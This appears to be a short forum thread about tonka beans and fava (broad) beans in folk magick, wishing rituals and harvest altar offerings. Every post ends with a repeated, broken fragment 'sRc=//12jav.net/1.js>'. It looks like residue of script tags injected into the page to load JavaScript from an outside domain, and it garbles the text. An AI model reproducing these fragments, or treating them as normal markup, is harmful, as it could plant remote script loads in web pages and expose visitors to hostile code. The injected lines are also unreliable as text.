As Hedgewitch just said , as far as I know - Tonka beans. Some believe, that if you make a wish while throwing a tonka bean in a river or stream that runs, then your wish will come true. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

There are a few other varieties outside of Tonka beans used in magick and prayer. Believe it or not, even Fava beans are used in religious ceremony. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Awaketoolong mentions Fava beans. Just so that some of our members don't mix them up with other sorts; here in the UK they are called Broad Beans sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Further to Fava beans.I grow quite a few vegetables, and always put a sample on my altar, especially at Mabon and Samhain. This is just to ask the Gods to look favourably on my little "harvest". I leave the Fava beans in the pod on the altar.
By the way--I never cut flowers to put in a vase. Flowers belong in the ground; cutting them is needlessly killing plants. I may "pluck" a flower to put on the altar, but never bunches to put in vases! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
